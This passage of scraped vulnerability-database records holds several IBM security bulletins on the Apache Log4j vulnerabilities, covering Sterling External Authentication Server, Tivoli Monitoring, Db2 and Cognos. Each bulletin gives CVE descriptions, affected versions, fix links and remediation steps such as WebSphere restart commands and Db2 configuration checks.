Sterling External Authentication Server is vulnerable to an arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix upgrades all Apache Log4j 1.x to Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<https://vulners.com/cve/CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling External Authentication Server| 6.0.3 \nIBM Sterling External Authentication Server| 6.0.2 \nIBM Sterling External Authentication Server| 2.4.3.2 \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| iFix| Remediation \n---|---|---|--- \nIBM Sterling External Authentication Server| 6.0.3| iFix 01 Plus Build 141| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus Build 214| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling External Authentication Server| 2.4.3.2| iFix 13 Plus Build 296| [Fix Central - 2432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=2.4.3.2&platform=All&function=all> \"Fix Central - 2432\" ) \nThis fix also remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T19:03:49", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Secure External Authentication Server (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T19:03:49", "id": "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "href": "https://www.ibm.com/support/pages/node/6538954", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:42:55", "description": "## Summary\n\nThe following security issue has been identified in components related to IBM Tivoli Monitoring (ITM) portal server and client. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<https://vulners.com/cve/CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Monitoring| 6.3.0 \n \n## Remediation/Fixes\n\nIn addition to the CVE in this bulletin the following are also addressed by the WebSphere patch below:\n\n[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>), [CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>), [CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>), [CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>)\n\n \nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n6.3.0.7-TIV-ITM-SP0010| 6.3.0.7 Fix Pack 7 Service Pack 10| <https://www.ibm.com/support/pages/node/6550868> \n6.X.X-TIV-ITM_TEPS_WAS-IHS_ALL_8.55.20.02| 6.3.0.7 Fix Pack 7 Service Pack 5 or later| <https://www.ibm.com/support/pages/node/6538128> \n \n## Workarounds and Mitigations\n\nNone of the vulnerable instances of log4j are actually used by ITM. If enabled, the IBM Tivoli Monitoring dashboard data provider may be using log4j client libraries which are not the actual log4j core function. Note all versions of log4j components are only installed if you've installed one of the following components:\n\ncj Tivoli Enterprise Portal Desktop Client \ncw Tivoli Enterprise Portal Browser Client \ncq Tivoli Enterprise Portal Server \n\nThe provided remediation will safely remove or update all vulnerable instances of log4j.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-30T17:31:59", "type": "ibm", "title": "Security Bulletin: Vulnerablity in Apache Log4j may affect IBM Tivoli Monitoring (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-12-30T17:31:59", "id": "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "href": "https://www.ibm.com/support/pages/node/6551452", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:52:33", "description": "## Summary\n\nThere are multiple Apache Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45105) impacting IBM StoredIQ for Legal. Apache Log4j is included in WebSphere Application Server (WAS), which is distributed with IBM Stored IQ for Legal. These vulnerabilities are addressed by removing Apache Log4j from WAS.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nStoredIQ for Legal| 2.0.3 \n \n\n\n## Remediation/Fixes\n\nFor the affected version specified above, apply [PH42762](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/StoredIQ+for+Legal&release=2.0.3.14&platform=All&function=all> \"\" ) interim fix on top of WAS 8.5.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-09T07:56:30", "type": "ibm", "title": "Security Bulletin: IBM StoredIQ for Legal is vulnerable to denial of service and remote code execution due to Apache log4j ( CVE-2021-44228, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-06-09T07:56:30", "id": "1827A1B8985F4A2B91EE262D4C17EF01B71CFEA86DB0A386BD1C1B098E2F4B69", "href": "https://www.ibm.com/support/pages/node/6593781", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:44:32", "description": "## Summary\n\nThe Apache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the log4j library to version 2.17.1. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-45046, CVE-2021-45105 and CVE-2021-44228 for bulletins relating to Log4j V2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured:\n\nFederation: \n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected by this issue. Please note that log4j v1.x was removed in a previous build, and customers are strongly recommended to apply those fixes if you are on an older version of Db2. See [Security Bulletin](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin\" ) for details.\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| [IT39584](<https://www.ibm.com/support/pages/apar/IT39584> \"IT39584\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140511_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A845800489744802176&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13806_140509_DSClients-linuxia32-client-11.5.6.0-FP000%3A517046716861436544&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140512_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A956085215716772224&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140513_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A437126386150870272&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140510_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A526111219902489984&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13806_140508_DSClients-nt32-client-11.5.6000.1809-FP000%3A411600865803667264&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140507_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A273075359147908384&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| 11.5.8| [IT39584](<https://www.ibm.com/support/pages/apar/IT39584> \"IT39584\" )| \n\n<https://www.ibm.com/support/pages/node/6830623> \n \n## Workarounds and Mitigations\n\nOn a Unix-type system, if you are not using Federation wrappers, you can remove log4j jar files. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-11T17:14:24", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-11-11T17:14:24", "id": "6DF2E72D03F9AA8435A0A58D154D82EDF5203309F8C81C42E35CBC71D2A79BDD", "href": "https://www.ibm.com/support/pages/node/6549888", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:53:57", "description": "## Summary\n\nWebSphere Application Server (WAS) is shipped as a component of IBM Security Guardium Key Lifecycle Manager (GKLM). Information about the Apache Log4j vulnerability has been published in a security bulletin. Customers are encouraged to take quick action to update their systems.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n\n\n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam.\n\n \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version(s)** \n \n---|--- \nIBM Security Key Lifecycle Manager (SKLM) v2.7** [EOS] | WebSphere Application Server v9.0.0.1 \nIBM Security Key Lifecycle Manager (SKLM) v3.0 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v3.0.1 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v4.0 | WebSphere Application Server v9.0.5.0 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1 | WebSphere Application Server v9.0.5.5 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1.1 | WebSphere Application Server Liberty 21.0.0.6 \n \n****** IBM Security Key Lifecycle Manager (SKLM) v2.7 - Applicable only for customer with extension.\n\n## Remediation/Fixes\n\n**IMPORTANT**\n\nThe fix in this bulletin has been superseded by [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6539408>). \n--- \n \n**IBM strongly recommends addressing the vulnerability now by upgrading. **\n\nDepending on your GKLM/SKLM version, see the relevant section:\n\n * For SKLM 3.0, 3.0.1 and SKLM 4.0\n * For GKLM 4.1\n * For GKLM 4.1.1\n\n* * *\n\n## For SKLM 3.0, 3.0.1 and SKLM 4.0\n\nFor information about the vulnerability fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) \u200b\u200b\u200b.\u200b\u200b\n\nYou only need to apply the interim fix provided by the WAS team. Before you apply the interim fix, check the WAS minimum fix pack requirement and the supported WAS for your SKLM version (see [Support Matrix](<https://www.ibm.com/support/pages/node/296957>)). \n\nFor instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>).\n\n**Note:** _Also applicable for SKLM 2.7_ (**only for customers with extension**).\n\n** Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1.0\n\n 1. On Linux and AIX systems, log in as the database user. For example, sklmdb41.\n 2. Stop WebSphere Application Server.\n\n**On Linux or AIX:**\n \n WAS_HOME/bin/stopServer.sh\u00a0server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/stopServer.sh server1 -username wasadmin -password waspassword\n\n**On Windows:**\n \n WAS_HOME\\bin\\stopServer.bat server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\stopServer.bat server1 -username wasadmin -password waspassword\n\n 3. Apply the WebSphere Application Server interim fix provided by the WAS team. For instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>). \n\nFor information about the vulnerability and fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) . \n\n**Note**: You only need to apply the interim fix provided by the WAS team.\n\n 4. Update Log4j.\n\n 1. Download the latest log4j 2.15.0 files from the following link: \n\n<https://archive.apache.org/dist/logging/log4j/2.15.0/>\n\n 2. Depending on your platform, download the applicable file: \n * apache-log4j-2.15.0-bin.tar.gz\n * apache-log4j-2.15.0-bin.zip\n 3. Extract the downloaded files. Copy the following extracted JAR files to some other location (for example, desktop): \n * log4j-api-2.15.0.jar\n * log4j-core-2.15.0.jar\n 4. Rename the JAR files as follows: \n * log4j-api-2.15.0.jar to log4j-api-2.13.3.jar\n * log4j-core-2.15.0.jar to log4j-core-2.13.3.jar\n\n**Note:** This is a workaround. Because of this workaround, even after you apply the fix, the grep command shows log4j-api-2.13.3.jar version in the output. However, be assured that Log4j is upgraded to log4j-api-2.15.0.jar.\n\n 5. Copy the renamed Log4j JAR files to the following location: \n\n**On Linux or AIX:**\n \n WAS_HOME/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\n**On Windows:**\n \n WAS_HOME\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\n 5. Start WebSphere Application Server. \n\n**On Linux or AIX:**\n \n WAS_HOME/bin/startServer.sh server1\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/startServer.sh server1\n\n**On Windows:**\n \n WAS_HOME\\bin\\startServer.bat server1\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\startServer.bat server1\n\n** **\n\n** **\n\n** ****Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required.\n\n* * *\n\n## For GKLM 4.1.1\n\nThis issue is fixed in [GKLM 4.1.1 - Fix Pack 2](<https://www.ibm.com/support/pages/node/6525282> \"GKLM 4.1.1 - Fix Pack 2\" ). You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral>).\n\n* * *\n\n** **\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T14:07:15", "type": "ibm", "title": "Security Bulletin: Apache Log4j (CVE-2021-44228) vulnerability in WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (SKLM) and IBM Security Guardium Key Lifecycle Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-04T14:07:15", "id": "30E9FB4250193CA2C5AB02F5095C96F34F2044E06280324E18E38EEFD7C1490E", "href": "https://www.ibm.com/support/pages/node/6527756", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:54:45", "description": "## Summary\n\nIBM Cognos Analytics is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-44228) vulnerability. Please note that this Security Bulletin has been superseded by Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832). See References section below.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nIf you have one of the listed affected versions, it is strongly recommended that you apply the most recent security update. \n\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc. you will access the Interim Fix via the link under the Bundled Customers.\n\nAffected Version\n\n| \n\nFix Version\n\n| \n\nBundled Customers \n \n---|---|--- \n \nIBM Cognos Analytics 11.2.x\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n 